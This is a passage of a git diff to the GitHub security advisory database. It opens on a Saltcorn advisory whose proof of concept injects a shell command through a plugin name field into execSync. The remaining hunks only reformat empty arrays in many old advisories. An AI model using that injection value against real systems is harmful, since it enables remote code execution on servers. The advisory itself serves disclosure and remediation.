this.tempDir); // [9] \n\t [...]\n }\n```\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112\n```js\nconst gitPullOrClone = async (plugin, pluginDir) => {\n [...]\n if (fs.existsSync(pluginDir)) {\n execSync(`git ${setKey} -C ${pluginDir} pull`);\n } else {\n execSync(`git ${setKey} clone ${plugin.location} ${pluginDir}`); // [10] \n }\n [...]\n};\n```\n\n### PoC\n\n- check that the file will be created by the command `echo \"hello\">/tmp/HACKED` does not exists:\n```\ncat /tmp/HACKED\ncat: /tmp/HACKED: No such file or directory\n```\n- login with an admin account\n- visit `http://localhost:3000/plugins/new`\n- enter the following fields:\n\t- Name: `;echo \"hello\">/tmp/HACKED`\n\t- Source: `git`\n\t- other fields blank\n- click `Create`\n- you will get an error saying `ENOENT: no such file or directory, ....` but the command `touch /tmp/HACKED` will be executed\n- to verify:\n```\ncat /tmp/HACKED\nhello\n```\n\n### Impact\n\nRemote code execution\n\n### Recommended Mitigation\n\nSanitize the `pluginDir` value before passing to `execSync`. Alternatively, use `child_process. execFileSync` API (docs: https://nodejs.org/api/child_process.html#child_processexecfilesyncfile-args-options)\n", "severity": [ diff --git a/advisories/unreviewed/2022/05/GHSA-2222-pjpq-3rhj/GHSA-2222-pjpq-3rhj.json b/advisories/unreviewed/2022/05/GHSA-2222-pjpq-3rhj/GHSA-2222-pjpq-3rhj.json index ac44fd32025..763ec59ae92 100644 --- a/advisories/unreviewed/2022/05/GHSA-2222-pjpq-3rhj/GHSA-2222-pjpq-3rhj.json +++ b/advisories/unreviewed/2022/05/GHSA-2222-pjpq-3rhj/GHSA-2222-pjpq-3rhj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-24jr-8pxp-69pm/GHSA-24jr-8pxp-69pm.json b/advisories/unreviewed/2022/05/GHSA-24jr-8pxp-69pm/GHSA-24jr-8pxp-69pm.json index 34f33308c77..4e2396b6f49 100644 --- a/advisories/unreviewed/2022/05/GHSA-24jr-8pxp-69pm/GHSA-24jr-8pxp-69pm.json +++ b/advisories/unreviewed/2022/05/GHSA-24jr-8pxp-69pm/GHSA-24jr-8pxp-69pm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-25vv-42cg-86cp/GHSA-25vv-42cg-86cp.json b/advisories/unreviewed/2022/05/GHSA-25vv-42cg-86cp/GHSA-25vv-42cg-86cp.json index c45b119ec1f..772638d78c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-25vv-42cg-86cp/GHSA-25vv-42cg-86cp.json +++ b/advisories/unreviewed/2022/05/GHSA-25vv-42cg-86cp/GHSA-25vv-42cg-86cp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-28gh-8gvx-2q8p/GHSA-28gh-8gvx-2q8p.json b/advisories/unreviewed/2022/05/GHSA-28gh-8gvx-2q8p/GHSA-28gh-8gvx-2q8p.json index 8c843e372a1..9e4aa44d755 100644 --- a/advisories/unreviewed/2022/05/GHSA-28gh-8gvx-2q8p/GHSA-28gh-8gvx-2q8p.json +++ b/advisories/unreviewed/2022/05/GHSA-28gh-8gvx-2q8p/GHSA-28gh-8gvx-2q8p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-28p8-84f4-q826/GHSA-28p8-84f4-q826.json b/advisories/unreviewed/2022/05/GHSA-28p8-84f4-q826/GHSA-28p8-84f4-q826.json index 26c8c782c53..0843a11a5ae 100644 --- a/advisories/unreviewed/2022/05/GHSA-28p8-84f4-q826/GHSA-28p8-84f4-q826.json +++ b/advisories/unreviewed/2022/05/GHSA-28p8-84f4-q826/GHSA-28p8-84f4-q826.json @@ -7,12 +7,8 @@ "CVE-2015-6725" ], "details": "The ANSendForSharedReview method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2994-cf23-4hmp/GHSA-2994-cf23-4hmp.json b/advisories/unreviewed/2022/05/GHSA-2994-cf23-4hmp/GHSA-2994-cf23-4hmp.json index 594dc3ed1a6..70128a0540d 100644 --- a/advisories/unreviewed/2022/05/GHSA-2994-cf23-4hmp/GHSA-2994-cf23-4hmp.json +++ b/advisories/unreviewed/2022/05/GHSA-2994-cf23-4hmp/GHSA-2994-cf23-4hmp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2c5j-c3wx-m67f/GHSA-2c5j-c3wx-m67f.json b/advisories/unreviewed/2022/05/GHSA-2c5j-c3wx-m67f/GHSA-2c5j-c3wx-m67f.json index 464b2f0e303..e3b917a4d5b 100644 --- a/advisories/unreviewed/2022/05/GHSA-2c5j-c3wx-m67f/GHSA-2c5j-c3wx-m67f.json +++ b/advisories/unreviewed/2022/05/GHSA-2c5j-c3wx-m67f/GHSA-2c5j-c3wx-m67f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2fqf-9j8p-6mg2/GHSA-2fqf-9j8p-6mg2.json b/advisories/unreviewed/2022/05/GHSA-2fqf-9j8p-6mg2/GHSA-2fqf-9j8p-6mg2.json index f8d5f88b0fb..a876e3daccd 100644 --- a/advisories/unreviewed/2022/05/GHSA-2fqf-9j8p-6mg2/GHSA-2fqf-9j8p-6mg2.json +++ b/advisories/unreviewed/2022/05/GHSA-2fqf-9j8p-6mg2/GHSA-2fqf-9j8p-6mg2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2g76-9p9p-qv6g/GHSA-2g76-9p9p-qv6g.json b/advisories/unreviewed/2022/05/GHSA-2g76-9p9p-qv6g/GHSA-2g76-9p9p-qv6g.json index 0da5b45ae1f..41c1753b2f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-2g76-9p9p-qv6g/GHSA-2g76-9p9p-qv6g.json +++ b/advisories/unreviewed/2022/05/GHSA-2g76-9p9p-qv6g/GHSA-2g76-9p9p-qv6g.json @@ -7,12 +7,8 @@ "CVE-2014-8450" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2015-4449, CVE-2015-4450, CVE-2015-5088, CVE-2015-5089, and CVE-2015-5092.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2g9j-4mvx-6c42/GHSA-2g9j-4mvx-6c42.json b/advisories/unreviewed/2022/05/GHSA-2g9j-4mvx-6c42/GHSA-2g9j-4mvx-6c42.json index 2433b3106f2..0e195c9692a 100644 --- a/advisories/unreviewed/2022/05/GHSA-2g9j-4mvx-6c42/GHSA-2g9j-4mvx-6c42.json +++ b/advisories/unreviewed/2022/05/GHSA-2g9j-4mvx-6c42/GHSA-2g9j-4mvx-6c42.json @@ -7,12 +7,8 @@ "CVE-2012-2038" ], "details": "Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X; before 10.3.183.20 and 11.x before 11.2.202.236 on Linux; before 11.1.111.10 on Android 2.x and 3.x; and before 11.1.115.9 on Android 4.x, and Adobe AIR before 3.3.0.3610, allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2gf2-4wwm-4cm6/GHSA-2gf2-4wwm-4cm6.json b/advisories/unreviewed/2022/05/GHSA-2gf2-4wwm-4cm6/GHSA-2gf2-4wwm-4cm6.json index 52b653f9a00..aad42151ed4 100644 --- a/advisories/unreviewed/2022/05/GHSA-2gf2-4wwm-4cm6/GHSA-2gf2-4wwm-4cm6.json +++ b/advisories/unreviewed/2022/05/GHSA-2gf2-4wwm-4cm6/GHSA-2gf2-4wwm-4cm6.json @@ -7,12 +7,8 @@ "CVE-2011-0411" ], "details": "The STARTTLS implementation in Postfix 2.4.x before 2.4.16, 2.5.x before 2.5.12, 2.6.x before 2.6.9, and 2.7.x before 2.7.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a \"plaintext command injection\" attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -116,9 +112,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2j64-3f3h-4p9c/GHSA-2j64-3f3h-4p9c.json b/advisories/unreviewed/2022/05/GHSA-2j64-3f3h-4p9c/GHSA-2j64-3f3h-4p9c.json index eb35393201f..c530f4780d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-2j64-3f3h-4p9c/GHSA-2j64-3f3h-4p9c.json +++ b/advisories/unreviewed/2022/05/GHSA-2j64-3f3h-4p9c/GHSA-2j64-3f3h-4p9c.json @@ -7,12 +7,8 @@ "CVE-2015-6707" ], "details": "The ANSendForReview method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2m2r-gjpf-5978/GHSA-2m2r-gjpf-5978.json b/advisories/unreviewed/2022/05/GHSA-2m2r-gjpf-5978/GHSA-2m2r-gjpf-5978.json index 0a7729b9226..6c23ab4d372 100644 --- a/advisories/unreviewed/2022/05/GHSA-2m2r-gjpf-5978/GHSA-2m2r-gjpf-5978.json +++ b/advisories/unreviewed/2022/05/GHSA-2m2r-gjpf-5978/GHSA-2m2r-gjpf-5978.json @@ -7,12 +7,8 @@ "CVE-2015-5101" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-4448, CVE-2015-5095, CVE-2015-5099, CVE-2015-5111, CVE-2015-5113, and CVE-2015-5114.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2m8j-8668-5vg5/GHSA-2m8j-8668-5vg5.json b/advisories/unreviewed/2022/05/GHSA-2m8j-8668-5vg5/GHSA-2m8j-8668-5vg5.json index e4aeb20d372..b2a5d269a8a 100644 --- a/advisories/unreviewed/2022/05/GHSA-2m8j-8668-5vg5/GHSA-2m8j-8668-5vg5.json +++ b/advisories/unreviewed/2022/05/GHSA-2m8j-8668-5vg5/GHSA-2m8j-8668-5vg5.json @@ -7,12 +7,8 @@ "CVE-2015-6693" ], "details": "The signatureSetSeedValue method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted arguments, a different vulnerability than CVE-2015-6685, CVE-2015-6686, CVE-2015-6694, CVE-2015-6695, and CVE-2015-7622.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2mjh-jc9q-3j6q/GHSA-2mjh-jc9q-3j6q.json b/advisories/unreviewed/2022/05/GHSA-2mjh-jc9q-3j6q/GHSA-2mjh-jc9q-3j6q.json index 3c2bc109e9f..c59ef581c19 100644 --- a/advisories/unreviewed/2022/05/GHSA-2mjh-jc9q-3j6q/GHSA-2mjh-jc9q-3j6q.json +++ b/advisories/unreviewed/2022/05/GHSA-2mjh-jc9q-3j6q/GHSA-2mjh-jc9q-3j6q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2pw8-r6j9-6vm6/GHSA-2pw8-r6j9-6vm6.json b/advisories/unreviewed/2022/05/GHSA-2pw8-r6j9-6vm6/GHSA-2pw8-r6j9-6vm6.json index d9507c4b012..b15735f2571 100644 --- a/advisories/unreviewed/2022/05/GHSA-2pw8-r6j9-6vm6/GHSA-2pw8-r6j9-6vm6.json +++ b/advisories/unreviewed/2022/05/GHSA-2pw8-r6j9-6vm6/GHSA-2pw8-r6j9-6vm6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2qqx-q5mg-9jj6/GHSA-2qqx-q5mg-9jj6.json b/advisories/unreviewed/2022/05/GHSA-2qqx-q5mg-9jj6/GHSA-2qqx-q5mg-9jj6.json index 2fd900e59ea..0fb841d26e8 100644 --- a/advisories/unreviewed/2022/05/GHSA-2qqx-q5mg-9jj6/GHSA-2qqx-q5mg-9jj6.json +++ b/advisories/unreviewed/2022/05/GHSA-2qqx-q5mg-9jj6/GHSA-2qqx-q5mg-9jj6.json @@ -7,12 +7,8 @@ "CVE-2015-6709" ], "details": "The CBBBRInvite method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2qx6-g25g-jpv2/GHSA-2qx6-g25g-jpv2.json b/advisories/unreviewed/2022/05/GHSA-2qx6-g25g-jpv2/GHSA-2qx6-g25g-jpv2.json index 15c792b4f38..70d3977c0b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-2qx6-g25g-jpv2/GHSA-2qx6-g25g-jpv2.json +++ b/advisories/unreviewed/2022/05/GHSA-2qx6-g25g-jpv2/GHSA-2qx6-g25g-jpv2.json @@ -7,12 +7,8 @@ "CVE-2015-6719" ], "details": "The CBSharedReviewCloseDialog method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2rf9-cmpf-qww5/GHSA-2rf9-cmpf-qww5.json b/advisories/unreviewed/2022/05/GHSA-2rf9-cmpf-qww5/GHSA-2rf9-cmpf-qww5.json index 742489d2dcb..a80acada28a 100644 --- a/advisories/unreviewed/2022/05/GHSA-2rf9-cmpf-qww5/GHSA-2rf9-cmpf-qww5.json +++ b/advisories/unreviewed/2022/05/GHSA-2rf9-cmpf-qww5/GHSA-2rf9-cmpf-qww5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2rx4-8xc8-6hf3/GHSA-2rx4-8xc8-6hf3.json b/advisories/unreviewed/2022/05/GHSA-2rx4-8xc8-6hf3/GHSA-2rx4-8xc8-6hf3.json index 6ae9103014c..d8fa7f1056d 100644 --- a/advisories/unreviewed/2022/05/GHSA-2rx4-8xc8-6hf3/GHSA-2rx4-8xc8-6hf3.json +++ b/advisories/unreviewed/2022/05/GHSA-2rx4-8xc8-6hf3/GHSA-2rx4-8xc8-6hf3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2vg8-mhwg-wq3f/GHSA-2vg8-mhwg-wq3f.json b/advisories/unreviewed/2022/05/GHSA-2vg8-mhwg-wq3f/GHSA-2vg8-mhwg-wq3f.json index 541f462f6eb..6c2c7a3c27e 100644 --- a/advisories/unreviewed/2022/05/GHSA-2vg8-mhwg-wq3f/GHSA-2vg8-mhwg-wq3f.json +++ b/advisories/unreviewed/2022/05/GHSA-2vg8-mhwg-wq3f/GHSA-2vg8-mhwg-wq3f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2wmg-qmv3-pmvc/GHSA-2wmg-qmv3-pmvc.json b/advisories/unreviewed/2022/05/GHSA-2wmg-qmv3-pmvc/GHSA-2wmg-qmv3-pmvc.json index 2a1bc9fbb5a..4ab05b7c448 100644 --- a/advisories/unreviewed/2022/05/GHSA-2wmg-qmv3-pmvc/GHSA-2wmg-qmv3-pmvc.json +++ b/advisories/unreviewed/2022/05/GHSA-2wmg-qmv3-pmvc/GHSA-2wmg-qmv3-pmvc.json @@ -7,12 +7,8 @@ "CVE-2015-4447" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4445, CVE-2015-4451, CVE-2015-4452, CVE-2015-5085, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2xq3-5ppq-3g78/GHSA-2xq3-5ppq-3g78.json b/advisories/unreviewed/2022/05/GHSA-2xq3-5ppq-3g78/GHSA-2xq3-5ppq-3g78.json index ed0fd009483..47e17612e41 100644 --- a/advisories/unreviewed/2022/05/GHSA-2xq3-5ppq-3g78/GHSA-2xq3-5ppq-3g78.json +++ b/advisories/unreviewed/2022/05/GHSA-2xq3-5ppq-3g78/GHSA-2xq3-5ppq-3g78.json @@ -7,12 +7,8 @@ "CVE-2015-7620" ], "details": "The ANSendForBrowserReview method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2xv7-rgc5-4ccg/GHSA-2xv7-rgc5-4ccg.json b/advisories/unreviewed/2022/05/GHSA-2xv7-rgc5-4ccg/GHSA-2xv7-rgc5-4ccg.json index 4e14d3bccff..df8874401e4 100644 --- a/advisories/unreviewed/2022/05/GHSA-2xv7-rgc5-4ccg/GHSA-2xv7-rgc5-4ccg.json +++ b/advisories/unreviewed/2022/05/GHSA-2xv7-rgc5-4ccg/GHSA-2xv7-rgc5-4ccg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2xxh-hp4f-fg97/GHSA-2xxh-hp4f-fg97.json b/advisories/unreviewed/2022/05/GHSA-2xxh-hp4f-fg97/GHSA-2xxh-hp4f-fg97.json index d55db728817..9dc04a93c6a 100644 --- a/advisories/unreviewed/2022/05/GHSA-2xxh-hp4f-fg97/GHSA-2xxh-hp4f-fg97.json +++ b/advisories/unreviewed/2022/05/GHSA-2xxh-hp4f-fg97/GHSA-2xxh-hp4f-fg97.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-33c5-fq57-8p37/GHSA-33c5-fq57-8p37.json b/advisories/unreviewed/2022/05/GHSA-33c5-fq57-8p37/GHSA-33c5-fq57-8p37.json index b3d59997f2b..fbd7d930452 100644 --- a/advisories/unreviewed/2022/05/GHSA-33c5-fq57-8p37/GHSA-33c5-fq57-8p37.json +++ b/advisories/unreviewed/2022/05/GHSA-33c5-fq57-8p37/GHSA-33c5-fq57-8p37.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-342f-jqfq-j38f/GHSA-342f-jqfq-j38f.json b/advisories/unreviewed/2022/05/GHSA-342f-jqfq-j38f/GHSA-342f-jqfq-j38f.json index 09ec6ab9e8b..069e1083cff 100644 --- a/advisories/unreviewed/2022/05/GHSA-342f-jqfq-j38f/GHSA-342f-jqfq-j38f.json +++ b/advisories/unreviewed/2022/05/GHSA-342f-jqfq-j38f/GHSA-342f-jqfq-j38f.json @@ -7,12 +7,8 @@ "CVE-2015-6721" ], "details": "The CBSharedReviewSecurityDialog method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-374c-8gp8-mfvr/GHSA-374c-8gp8-mfvr.json b/advisories/unreviewed/2022/05/GHSA-374c-8gp8-mfvr/GHSA-374c-8gp8-mfvr.json index 01651756780..690bd3ee3b9 100644 --- a/advisories/unreviewed/2022/05/GHSA-374c-8gp8-mfvr/GHSA-374c-8gp8-mfvr.json +++ b/advisories/unreviewed/2022/05/GHSA-374c-8gp8-mfvr/GHSA-374c-8gp8-mfvr.json @@ -7,12 +7,8 @@ "CVE-2012-2419" ], "details": "Memory leak in the intu-help-qb (aka Intuit Help System Async Pluggable Protocol) handlers in HelpAsyncPluggableProtocol.dll in Intuit QuickBooks 2009 through 2012, when Internet Explorer is used, allows remote attackers to cause a denial of service (memory consumption) via a URI with multiple references to the same name-value pair.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ 